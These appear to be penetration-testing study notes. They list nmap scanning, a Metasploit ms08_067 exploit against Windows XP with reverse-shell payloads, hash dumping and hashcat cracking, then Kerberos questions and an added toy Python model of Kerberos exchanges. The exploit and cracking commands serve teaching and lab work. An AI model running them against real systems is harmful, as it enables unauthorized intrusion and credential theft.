1 - Discover hosts (IP Addresses) on a network
nmap -sP 192.168.1.0/24
2 - Determine Operating Systems of the hosts
nmap -O -v <ip address>
3 - Use metasploit framework to gain access to another OS
Launch msfconsole
sessions -l, sessions -i <session id>
search windows/smb
search netapi
1 - WinXP
Decide on exploit:
use exploit/windows/smb/ms08_067_netapi
Decide on payload:
windows/vncinject/reverse_tcp
or
set payload windows/meterpreter/reverse_tcp
Settings:
show options
set rhost <target ip>
set lhost <attacker ip>
set ViewOnly false (vncinject payload only)
Run exploit:
exploit
hashdump
download <remote file> <local path>
4 - Locate password hashes & crack them (brute force / wordlist attack)
./hashcat-cli64.app -m <hash type> <hash file> <password file>
5 - Explain Kerberos Ticket Exchanges.
- How does TGS know...
- Name the key that is used to...
- What keys use authenticators?
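A runnable model of the three Kerberos exchanges (AS, TGS, AP) makes the answers to the questions above concrete: the TGS learns the client/TGS session key by decrypting the TGT with the krbtgt key, the TGS authenticator is sealed with the client/TGS session key, and the service authenticator is sealed with the client/service session key. This is an added example, not part of the original notes; the principal names (alice, krbtgt, cifs/fileserver), the toy sealing scheme and the 300-second skew window are assumptions for illustration, and real Kerberos (AES etypes, pre-authentication, ASN.1) is not modelled.

```python
"""Toy model of the Kerberos AS, TGS and AP exchanges (example code, not from the notes).
Assumed: principal names, a hash-based sealing scheme instead of AES, no pre-auth."""
import hashlib, hmac, json, os, time

def _keystream(key, nonce, n):
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def seal(key, obj):
    """Encrypt-then-MAC a JSON-able object under a symmetric key (toy scheme, not AES)."""
    pt = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(12)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key, blob):
    """Verify the tag, then decrypt; a wrong key or tampering raises ValueError."""
    nonce, ct, tag = blob[:12], blob[12:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered blob")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

SKEW = 300  # assumed clock-skew tolerance (seconds) when checking authenticator timestamps

class KDC:
    def __init__(self, keys):
        self.keys = keys  # long-term keys of every principal, including "krbtgt"

    def as_exchange(self, cname):
        sk = os.urandom(16)  # client/TGS session key
        tgt = seal(self.keys["krbtgt"], {"cname": cname, "sk": sk.hex(), "exp": time.time() + 3600})
        # reply part readable only with the client's long-term key; the TGT is opaque to the client
        return seal(self.keys[cname], {"sk": sk.hex(), "sname": "krbtgt"}), tgt

    def tgs_exchange(self, tgt, authenticator, sname):
        t = unseal(self.keys["krbtgt"], tgt)      # TGS recovers the session key from the TGT
        sk_tgs = bytes.fromhex(t["sk"])
        a = unseal(sk_tgs, authenticator)         # authenticator proves the client holds sk_tgs
        if a["cname"] != t["cname"] or abs(time.time() - a["ts"]) > SKEW or t["exp"] < time.time():
            raise PermissionError("TGS-REQ rejected")
        sk_svc = os.urandom(16)                   # client/service session key
        ticket = seal(self.keys[sname], {"cname": t["cname"], "sk": sk_svc.hex()})
        return seal(sk_tgs, {"sk": sk_svc.hex(), "sname": sname}), ticket

class Service:
    def __init__(self, key):
        self.key, self.seen = key, set()  # replay cache of authenticators already accepted

    def ap_exchange(self, ticket, authenticator):
        t = unseal(self.key, ticket)                           # service key opens the ticket
        a = unseal(bytes.fromhex(t["sk"]), authenticator)      # session key opens the authenticator
        if a["cname"] != t["cname"] or abs(time.time() - a["ts"]) > SKEW:
            raise PermissionError("AP-REQ rejected")
        if (a["cname"], a["ts"]) in self.seen:
            raise PermissionError("replayed authenticator")
        self.seen.add((a["cname"], a["ts"]))
        return t["cname"]

def run_exchanges():
    """Walk alice through AS -> TGS -> AP and record which key sealed each item."""
    keys = {"alice": os.urandom(16), "krbtgt": os.urandom(16), "cifs/fileserver": os.urandom(16)}
    kdc, svc = KDC(keys), Service(keys["cifs/fileserver"])
    trace = {"tgt_key": "krbtgt long-term key"}
    enc_part, tgt = kdc.as_exchange("alice")
    sk_tgs = bytes.fromhex(unseal(keys["alice"], enc_part)["sk"])
    auth1 = seal(sk_tgs, {"cname": "alice", "ts": time.time()})
    trace["tgs_authenticator_key"] = "client/TGS session key"
    enc_part2, ticket = kdc.tgs_exchange(tgt, auth1, "cifs/fileserver")
    sk_svc = bytes.fromhex(unseal(sk_tgs, enc_part2)["sk"])
    auth2 = seal(sk_svc, {"cname": "alice", "ts": time.time()})
    trace["ap_authenticator_key"] = "client/service session key"
    trace["accepted_as"] = svc.ap_exchange(ticket, auth2)
    try:  # the same AP-REQ presented again inside the skew window is refused by the replay cache
        svc.ap_exchange(ticket, auth2)
        trace["replay_rejected"] = False
    except PermissionError:
        trace["replay_rejected"] = True
    try:  # without sk_tgs a party holding only the TGT cannot produce a valid authenticator
        kdc.tgs_exchange(tgt, seal(os.urandom(16), {"cname": "alice", "ts": time.time()}), "cifs/fileserver")
        trace["forged_auth_rejected"] = False
    except (ValueError, PermissionError):
        trace["forged_auth_rejected"] = True
    return trace

if __name__ == "__main__":
    print(json.dumps(run_exchanges(), indent=2))
```

The replay cache and skew check in `Service.ap_exchange` are the two controls that make a captured authenticator useless to a third party, which is why both verifiers key their checks on the authenticator's timestamp and principal name rather than on the ticket alone.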